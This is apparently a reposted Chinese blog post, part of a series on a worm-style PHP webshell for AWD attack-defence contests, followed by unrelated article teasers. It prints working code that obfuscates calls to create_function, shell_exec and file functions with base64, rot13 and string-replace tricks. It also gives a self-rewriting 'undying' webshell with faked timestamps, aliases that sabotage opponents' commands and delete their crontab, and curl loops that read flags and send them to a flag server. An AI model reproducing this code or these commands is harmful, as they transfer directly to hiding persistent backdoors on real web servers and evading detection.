基于AWD比赛的蠕虫webshell(四) awd 蠕虫
yuyutoo 2024-11-10 13:47 3 浏览 0 评论
原创:3s_NWGeek合天智汇
原创投稿活动:http://link.zhihu.com/?target=https%3A//mp.weixin.qq.com/s/Nw2VDyvCpPt_GG5YKTQuUQ
蠕虫webshell虽然功能比较复杂,但是看懂了代码还是有机会进行防御和被他人利用的,还是有必要进行代码混淆的。
历史文章:
蠕虫webshell代码功能详情:https://mp.weixin.qq.com/s/8jrb_q8oysSfC2CC6m13bw
蠕虫webshell复活框架:https://mp.weixin.qq.com/s/R9TDu5QdUnPUtfV-_v0iCw
蠕虫webshell适配msf、前端传播与反渗透 :https://zhuanlan.zhihu.com/write
0x00 蠕虫webshell代码混淆
先说混淆后的效果,报1级变量函数,但考虑到蠕虫webshell是要每个php文件都要插入这么大段代码,大家都是做安全的明白人应该知道这个有问题,所以暂时达到混淆的目的,免杀就不多考虑了。
混淆后总体效果,仅只有1行代码:
混淆解释和原理:
定义一个包含str_replace的字符串,加入混淆字符串mR3s,后面使用str_replace替换mR3s中间字符,就会剩下str_replace了, <?php $assd='mR3sstmR3sr_mR3sreplamR3scmR3semR3s';
后面会使用这个变量来替代更多函数。
$JuGjDjgsM=str_replace('mR3s', '', $assd);//str_replace
蠕虫webshell后面会检查第一行是否存在此检索字符,否则重复写入蠕虫webshell
$author = '3s_NwGeek';
后面定义两个关键的编码和加密函数base64_decode和str_rot13
$saddd='bup4Tasup4Te6up4T4_dup4Teup4Tcode';// base64_decode混淆字符串 $osmHO='c3BPa2U0dGZ0cnBPa2U0dGZfcm9wT2tlNHRmdDEz'; //str_rot13混淆字符串
变量可以通过变量函数写出来一些字符串编码或者换位的函数
$JuGjDjgsM=str_replace('mR3s', '', $assd);//str_replace $KjHggsG=$JuGjDjgsM('up4T','',$saddd);//base64_decode $PLiskmr=$JuGjDjgsM('pOke4tf','',$KjHggsG($osmHO));//str_rot13 $sAtArR4E4V=$JuGjDjgsM('kks','',$KjHggsG('c3Rra3NycmVra3N2'));//strrev()
有了以上的字符串处理函数,可以写一个加解密函数方便后续写代码
可以写出一个加密函数:
str_replace(‘=’,$osmHO,strrev(base64_encode(str_rot13(“明文”))))
function encr($text){ global $JuGjDjgsM,$PLiskmr,$sAtArR4E4V,$osmHO; return $JuGjDjgsM('=',$osmHO,$sAtArR4E4V(base64_encode($PLiskmr($text)))); }
由上再写一个解密函数: str_rot13((base64_decode(strrev(str_replace(‘=’,$osmHO,密文)))
if (!function_exists('O0o0OOo')) { function O0o0OOo($enc){ global $JuGjDjgsM,$PLiskmr,$sAtArR4E4V,$KjHggsG,$osmHO; return $PLiskmr($KjHggsG($sAtArR4E4V($JuGjDjgsM($osmHO,'=',($enc))))); }}
蠕虫webshell中可以通过解密函数,把自己加密好的密文用蠕虫webshell中解密函数解出来,作为变量函数去调用。
if (!function_exists('O0o0OOo')) { function O0o0OOo($enc){ global $JuGjDjgsM,$PLiskmr,$sAtArR4E4V,$KjHggsG,$osmHO; return $PLiskmr($KjHggsG($sAtArR4E4V($JuGjDjgsM($osmHO,'=',($enc))))); }}
由以上变量编码替换和rot13可以得到:
create_function
$Oo0oO=O0o0OOo('hJmdnBXYoN3XydmbyVGc');//create_function
function O0o0OOo()解密函数
$oOoOo=O0o0OOo('c3BPa2U0dGZ0cnBPa2U0dGZfcm9wT2tlNHRmdDEzc3BPa2U0dGZ0cnBPa2U0dGZfcm9wT2tlNHRmdDEzgYCJEMiBjQ');//function O0o0OOo()解密函数
我们通过之前的加密函数加密好的字符串,再用上面这个function O0o0OOo()解密函数解密出来定义为变量。
就可以得出:
is_dir
$oOOOOo=O0o0OOo('lZXcfZmd');//is_dir
opendir
$oOO0Oo=O0o0OOo('c3BPa2U0dGZ0cnBPa2U0dGZfcm9wT2tlNHRmdDEzc3BPa2U0dGZ0cnBPa2U0dGZfcm9wT2tlNHRmdDEzQZ2FXYyNmY');//opendir
readdir
$o0O0O0=O0o0OOo('c3BPa2U0dGZ0cnBPa2U0dGZfcm9wT2tlNHRmdDEzc3BPa2U0dGZ0cnBPa2U0dGZfcm9wT2tlNHRmdDEzQZ2FXcuJXZ');//readdir
closedir
$o000O0=O0o0OOo('c3BPa2U0dGZ0cnBPa2U0dGZfcm9wT2tlNHRmdDEzUmdxJnZilHc');//closedir
fputs
$Oo00O0=O0o0OOo('c3BPa2U0dGZ0cnBPa2U0dGZfcm9wT2tlNHRmdDEzY2ZoN2c');//fputs
fopen
$Oo0oO0=O0o0OOo('c3BPa2U0dGZ0cnBPa2U0dGZfcm9wT2tlNHRmdDEzEmcjJ2c');//fopen
fget
$O00oo0=O0o0OOo('c3BPa2U0dGZ0cnBPa2U0dGZfcm9wT2tlNHRmdDEzY2ZyR3c');//fget
fclose
$Oo0oo0=O0o0OOo('yZmY5B3c');//fclose
fwrite
$Oo00=O0o0OOo('ydmdlp2c');//fwrite
chr
$Oo0ooo=O0o0OOo('lVHc');//chr
shell_exec
$O00o0=O0o0OOo('c3BPa2U0dGZ0cnBPa2U0dGZfcm9wT2tlNHRmdDEzc3BPa2U0dGZ0cnBPa2U0dGZfcm9wT2tlNHRmdDEzAcytmcflXeyVnZ');//shell_exec
rawurlencode
$Oooooo=O0o0OOo('yFnYwFmc5VGaq5WZ');//rawurlencode
'192.168.3.1'
$b = $oOoOo('c3BPa2U0dGZ0cnBPa2U0dGZfcm9wT2tlNHRmdDEzEjLz4CO2EjLykTM');//'192.168.3.1'
0x01 混淆效果
然后把危险函数给替换掉,去掉缩进换成1行,把变量命名得难分辨效果如下图。
0x02 不死蠕虫webshell
混淆之后,为了更好地维持权限,我再嵌套了大家常用的不死马,成为不死蠕虫webshell,测试过并没有影响功能的。
<?php set_time_limit(0); ignore_user_abort(1); while(1){ file_put_contents(__FILE__,base64_decode(' 这里填充base64_encode(混淆后的蠕虫webshell代码) ')); touch(__FILE__,mktime(20,15,1,11,28,2017)); usleep(100); } ?>
到这里蠕虫webshell就告一段落了,有需要可以蠕虫webshell框架源码可以在github下载
https://github.com/3sNwgeek/awd_worm_phpwebshell_framework/。
谈谈awd攻防赛几个有趣的技巧
一、alias别名 (权限)
对方执行whoami命令的时候回显就是Excute fail
alias whoami="echo 'Excute fail'"
对方执行cat /flag 命令的时候回显就是错误flag
alias cat="echo `date`|md5sum|cut -d ' ' -f1||"
对方执行crontab命令的时候回显就是no crontab for 当前用户
crontab -r alias crontab="echo no crontab for `whoami` ||"
其次还可以帮其他人服务器清除计划任务,减少分值被平分的机会。
替换命令,其他攻击者不知道更改命令,getflag操作可能不成功
注意是www-data权限,和比赛得到的xctf权限都最好替换
防:使用绝对路径执行命令 /usr/bin/cat /flag
二、获取getflag方式和提交flag方式信息
常见比赛getflag方式有两种:
1. 储存在靶机本地根目录或网站根目录
2. 需要在靶机http访问flag服务器
根据以上两种getflag方式,有以下2种submit flag方式 1. 带token get/post请求
curl http://flag.host/submit.php?flag={xxx}&token=xxx
curl http://flag.host/submit.php -d flag={xxx}&token=xxx 2. 带cookie get/post请求
curl http://flag.host/submit.php?flag={xxx} -H cookie:xxx
根据这些getflag和submit flag方式,在实战中又可以区分为两种方式完成:
一般情况下比赛靶机为linux
- 靶机getflag+攻击机submit flag
靶机命令执行返回flag再使用py脚本批量提交
- 靶机getflag&submit flag(重点推荐)
我在比赛中主要使用这种方式每隔2分钟循环提交flag一次。
flag在本地获取再提交
curl http://flag.host/submit.php?flag=$(cat /var/www/html/flag)&token=xxx -H cookie:xxx
flag在flag机获取再提交
curl http://flag.host/submit.php?flag=$(curl http://flag.host/getflag.php)&token=xxx -H cookie:xxx
插上一个循环就可以一劳永逸了,除非对手重置环境或者服务,不然是一直提交的。
'while true;do curl http://flaghost/submit_flag/ -d "flag=$(cat /var/www/html/flag.txt)&token=666";sleep 60;done;'
三、捕获别人flag token
如果比赛有限制提交flag次数(防爆破),本地抓流量如果别人在靶机本地用token提交flag,可以利用别人flag token发送超限次数,导致当轮该token无法再提交更多flag(一般限制次数一千),就是比赛方也没有明令禁止不能用别人的token交flag,战术犯规。
声明:笔者初衷用于分享与普及网络知识,若读者因此作出任何危害网络安全行为后果自负,与合天智汇及原作者无关!
相关推荐
- 史上最全的浏览器兼容性问题和解决方案
-
微信ID:WEB_wysj(点击关注)◎◎◎◎◎◎◎◎◎一┳═┻︻▄(页底留言开放,欢迎来吐槽)●●●...
-
- 平面设计基础知识_平面设计基础知识实验收获与总结
-
CSS构造颜色,背景与图像1.使用span更好的控制文本中局部区域的文本:文本;2.使用display属性提供区块转变:display:inline(是内联的...
-
2025-02-21 16:01 yuyutoo
- 写作排版简单三步就行-工具篇_作文排版模板
-
和我们工作中日常word排版内部交流不同,这篇教程介绍的写作排版主要是用于“微信公众号、头条号”网络展示。写作展现的是我的思考,排版是让写作在网格上更好地展现。在写作上花费时间是有累积复利优势的,在排...
- 写一个2048的游戏_2048小游戏功能实现
-
1.创建HTML文件1.打开一个文本编辑器,例如Notepad++、SublimeText、VisualStudioCode等。2.将以下HTML代码复制并粘贴到文本编辑器中:html...
- 今天你穿“短袖”了吗?青岛最高23℃!接下来几天气温更刺激……
-
最近的天气暖和得让很多小伙伴们喊“热”!!! 昨天的气温到底升得有多高呢?你家有没有榜上有名?...
- CSS不规则卡片,纯CSS制作优惠券样式,CSS实现锯齿样式
-
之前也有写过CSS优惠券样式《CSS3径向渐变实现优惠券波浪造型》,这次再来温习一遍,并且将更为详细的讲解,从布局到具体样式说明,最后定义CSS变量,自定义主题颜色。布局...
- 你的自我界限够强大吗?_你的自我界限够强大吗英文
-
我的结果:A、该设立新的界限...
- 行内元素与块级元素,以及区别_行内元素和块级元素有什么区别?
-
行内元素与块级元素首先,CSS规范规定,每个元素都有display属性,确定该元素的类型,每个元素都有默认的display值,分别为块级(block)、行内(inline)。块级元素:(以下列举比较常...
-
- 让“成都速度”跑得潇潇洒洒,地上地下共享轨交繁华
-
去年的两会期间,习近平总书记在参加人大会议四川代表团审议时,对治蜀兴川提出了明确要求,指明了前行方向,并带来了“祝四川人民的生活越来越安逸”的美好祝福。又是一年...
-
2025-02-21 16:00 yuyutoo
- 今年国家综合性消防救援队伍计划招录消防员15000名
-
记者24日从应急管理部获悉,国家综合性消防救援队伍2023年消防员招录工作已正式启动。今年共计划招录消防员15000名,其中高校应届毕业生5000名、退役士兵5000名、社会青年5000名。本次招录的...
- 一起盘点最新 Chrome v133 的5大主流特性 ?
-
1.CSS的高级attr()方法CSSattr()函数是CSSLevel5中用于检索DOM元素的属性值并将其用于CSS属性值,类似于var()函数替换自定义属性值的方式。...
- 竞走团体世锦赛5月太仓举行 世界冠军杨家玉担任形象大使
-
style="text-align:center;"data-mce-style="text-align:...
- 学物理能做什么?_学物理能做什么 卢昌海
-
作者:曹则贤中国科学院物理研究所原标题:《物理学:ASourceofPowerforMan》在2006年中央电视台《对话》栏目的某期节目中,主持人问过我一个的问题:“学物理的人,如果日后不...
-
- 你不知道的关于这只眯眼兔的6个小秘密
-
在你们忙着给熊本君做表情包的时候,要知道,最先在网络上引起轰动的可是这只脸上只有两条缝的兔子——兔斯基。今年,它更是迎来了自己的10岁生日。①关于德艺双馨“老艺...
-
2025-02-21 16:00 yuyutoo
你 发表评论:
欢迎- 一周热门
- 最近发表
- 标签列表
-
- mybatis plus (70)
- scheduledtask (71)
- css滚动条 (60)
- java学生成绩管理系统 (59)
- 结构体数组 (69)
- databasemetadata (64)
- javastatic (68)
- jsp实用教程 (53)
- fontawesome (57)
- widget开发 (57)
- vb net教程 (62)
- hibernate 教程 (63)
- case语句 (57)
- svn连接 (74)
- directoryindex (69)
- session timeout (58)
- textbox换行 (67)
- extension_dir (64)
- linearlayout (58)
- vba高级教程 (75)
- iframe用法 (58)
- sqlparameter (59)
- trim函数 (59)
- flex布局 (63)
- contextloaderlistener (56)